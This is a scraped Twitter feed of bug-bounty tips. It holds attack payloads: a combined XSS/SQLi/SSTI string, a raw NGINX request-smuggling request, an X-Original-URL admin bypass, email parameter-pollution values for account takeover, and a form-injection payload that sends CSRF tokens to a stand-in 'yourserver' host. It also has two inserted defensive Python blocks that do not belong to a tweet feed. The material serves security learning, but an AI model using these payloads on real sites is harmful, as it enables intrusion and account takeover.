Tweets
Pinned Tweet
Google dork: site:http://s3.amazonaws.com target. This will help you find S3 buckets. Razer S3 Bucket Hacked by @snowoverride $$ 500 $$ Write Up https://github.com/ESME-Security/researchWriteup/blob/master/Razer/writeups/710319.md
Your Next Bug Tip Retweeted
#ffuf @ngkogkos @joohoi @Jhaddix Subdomain bruteforce with ffuf on port 443. It works fine: ffuf -u https://FUZZ.rootdomain.com -w jhaddixall.txt -v | grep "| URL | " | awk '{print $4}'
Your Next Bug Tip Retweeted
Takeover story of a repo: 1. A site having a GitHub logo. 2. Example: click on the logo, it'll show you the git repo (http://github.com/site/ ). 3. In my case, it was 404. Main part: 4. Created a git account with the name of the company, so it was like http://github.com/site/ . Successful takeover.
Your Next Bug Tip Retweeted
Used X-Original-URL: /ADMIN
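The tip above relies on a backend honoring a path-override header that the front proxy never saw. As an added example (not code from the tweet or from any project), here is a small Python routing front that drops such headers before routing and makes its access decision only on the normalized request-line path. The header names, the /admin prefix, and the function names are assumptions for this illustration.

```python
import posixpath
from urllib.parse import unquote

# Headers some stacks treat as a replacement for the request-line path.
# Assumption for this example: these are the names we refuse to honor.
OVERRIDE_HEADERS = {"x-original-url", "x-rewrite-url"}

# Assumed protected area for this example.
PROTECTED_PREFIXES = ("/admin",)


def strip_override_headers(headers):
    """Return (clean_headers, dropped_names); name matching is case-insensitive."""
    clean, dropped = {}, []
    for name, value in headers.items():
        if name.lower() in OVERRIDE_HEADERS:
            dropped.append(name)
        else:
            clean[name] = value
    return clean, dropped


def normalize_path(raw_target):
    """Canonical form of the request-line path: query removed, percent-decoded,
    dot segments and duplicate slashes collapsed, case folded."""
    path = unquote(raw_target.split("?", 1)[0])
    # lstrip avoids the POSIX '//' special case that normpath would preserve
    path = posixpath.normpath("/" + path.lstrip("/"))
    return path.lower()


def is_protected(path):
    """ACL check on an already-normalized path: exact match or sub-path."""
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def resolve_route(raw_target, headers):
    """Decide what the backend will serve, ignoring override headers entirely.
    Returns (normalized_path, protected, dropped_header_names)."""
    _, dropped = strip_override_headers(headers)
    path = normalize_path(raw_target)
    return path, is_protected(path), dropped


if __name__ == "__main__":
    # Constructed request: a public path with an override header attached.
    print(resolve_route("/public", {"Host": "example.test", "X-Original-URL": "/ADMIN"}))
```

The point of the design is that the same normalized path drives both the access check and the backend route, so no header can make the two disagree; logging the dropped header names also gives a cheap detection signal.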
Your Next Bug Tip Retweeted
RCE story: 1. site.com/admin - Forbidden. 2. HTTP header in request - login page access. 3. SQLi queries tried, no success. 4. Some recon on GitLab - found base64 pwd - decrypted. 5. Accessed admin panel. 6. Admin panel customized - CLI available. 7. File read successful.
BLH - Broken Link Hijacking. Just suppose your site uses cool.c/Script.js. After a few years cool.c decides to close its services. Now the story begins:
buys cool.c and then hosts Script.js
BOoOM
This happened to LinkedIn
READ BELOW
#bugbountytips #bugbountytip #bugbounty https://twitter.com/fatratfatrat/status/1222950920079626240
Your Next Bug Tip Retweeted
@albinowax sir, I am facing a small confusion on HTTP Request Smuggling. Please help me with this https://hackerone.com/reports/498052 . You were explaining that all normal HTTP clients, including web browsers, do follow redirects. The two stolen requests I showed above came from such clients.
Your Next Bug Tip Retweeted
I went COSMIC on the second week of 2020: Found a weirdly deep subdomain on @censysio and looked at it. => Then found a JS file with different hardcoded endpoints => tried those endpoints => found another subdomain => asked for creds, used admin:admin [1/n]
Your Next Bug Tip Retweeted
If anyone wants tons of resources for #bugbounty & #infosec, or wants to collab with others for #bughunting and play #ctf, can join my server here. You can share your ideas and projects and we can work together. #bugbountytips #bugbountytools https://discord.gg/gs77mJ5
Your Next Bug Tip Retweeted
To test XSS + SQLi + SSTI/CSTI with the same payload use: '"><svg/onload=prompt(5);>{{7*7}} . The ' ==> for SQL injection; "><svg/onload=prompt(5);> ==> for XSS; {{7*7}} ==> for SSTI/CSTI.
#bugbounty #infosec #TogetherWeHitHarder #bugbountyprotip #Pentesting #bugbountytips by me!
Your Next Bug Tip Retweeted
Happy Friday hackers! Nitesh @ideaengine007 found a critical RCE vulnerability in Jenkins that led us to discover a Bitcoin mining service running on a DoD website. Head over to the disclosed report to see all the details! Thanks for being
Nitesh https://hackerone.com/reports/768266
Haha, as expected no one is sharing. Ok then, share the worst external bug bounty program; at least it will save others' time.
#bugbounty #bugbountytip #BugBountyTips https://twitter.com/YourNextBug/status/1223285007248023552
Your Next Bug Tip Retweeted
Inject XSSHunter's payload in PortSwigger's hackability and send it to your target server to check for server-side JS execution. It will help you get screenshots in case there is a blind SSRF :)
#bugbountytips
Any good external bug bounty program?
#bugbounty #bugbountytips #bugbountytip
Steps: 0) Log in with Twitter. 1) Host Header Injection [to a.cxx]. 2) Generate OAuth token link. 3) Send link to victim; after victim authorizes, 4) verifier is sent to a.cxx. 5) Reuse token: Account Takeover by @ngalongc
#bugbountytips #bugbountytip https://hackerone.com/reports/317476
Your Next Bug Tip Retweeted
This report is also an example, i.e. sending an array of the email addresses: https://hackerone.com/reports/322985
Your Next Bug Tip Retweeted
Got advised by a friend: email=victim@email.com&email=attacker@email.com ; email=victim@email.com,attacker@email.com ; email[0]=victim@email.com&email[1]=attacker@email.com
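The three parameter shapes in the tip above (duplicate key, comma-joined value, indexed array key) all aim at a handler that silently accepts more than one address. As an added example, not code from the tweet or any project, here is server-side input handling in Python that accepts exactly one address and rejects each of those shapes explicitly. The function names and the error type are assumptions for this illustration; the sample inputs are constructed.

```python
from urllib.parse import parse_qs


class InvalidEmailParameter(ValueError):
    """Raised when the request does not carry exactly one plain email address."""


def single_email_from_query(query_string: str) -> str:
    """Return the single 'email' value from a form body or query string.

    Rejects duplicate keys, indexed keys such as email[0], and delimiter-joined
    values so that a second address cannot ride along with the first.
    """
    params = parse_qs(query_string, keep_blank_values=True)

    # Any key that is 'email' or an indexed variant counts as an email parameter.
    email_keys = [k for k in params if k == "email" or k.startswith("email[")]
    if email_keys != ["email"]:
        raise InvalidEmailParameter("expected exactly one 'email' parameter")

    values = params["email"]
    if len(values) != 1:
        raise InvalidEmailParameter("duplicate 'email' parameter")

    value = values[0].strip()
    # Commas, semicolons and whitespace are the usual list separators; a second
    # '@' is the other sign that two addresses were packed into one field.
    if any(ch in value for ch in ",; \t\r\n") or value.count("@") != 1:
        raise InvalidEmailParameter("value must be a single address")

    local, _, domain = value.partition("@")
    if not local or "." not in domain:
        raise InvalidEmailParameter("malformed address")
    return value


def classify(query_string: str):
    """Convenience wrapper returning ('ok', address) or ('rejected', reason)."""
    try:
        return ("ok", single_email_from_query(query_string))
    except InvalidEmailParameter as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    # Constructed inputs mirroring the shapes in the tip.
    for qs in (
        "email=victim@email.com",
        "email=victim@email.com&email=attacker@email.com",
        "email=victim@email.com,attacker@email.com",
        "email[0]=victim@email.com&email[1]=attacker@email.com",
    ):
        print(qs, "->", classify(qs))
```

The key-level check runs before the value-level check on purpose: a framework that flattens email[0] and email[1] into a list would otherwise make the duplicate case invisible to a function that only looks at params["email"].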
Your Next Bug Tip Retweeted
#bugbountytips #bugbounty NGINX error_page request smuggling. Example vulnerable request:
GET /a HTTP/1.1
Host: localhost
Content-Length: 56

GET /_hidden/index.html HTTP/1.1
Host: notlocalhost
Vulnerable versions: 1.8.1 1.8.1 1.9.5 1.14.1 1.14.2 1.15.9 1.16.1 1.17.6
Your Next Bug Tip Retweeted
#bugbountytips #bugbounty Login page authentication bypass: any file name / authorize. account/connect/authorize, home/authorize, dashboard/authorize, account/authorize/ pic.twitter.com/Otm5sb8DS3
Your Next Bug Tip Retweeted
If you have an XSS in a <form> tag, close it and open a new form that you are controlling. Payload: "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.
#bugbountytip #bugbountytips https://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/
Your Next Bug Tip Retweeted
Scanning a Cloudflare WAF protected website.. impossible? 1) Find the real server IP (censys). 2) Use a Burp proxy regex to modify Host to the original server address :D
#bugbountytips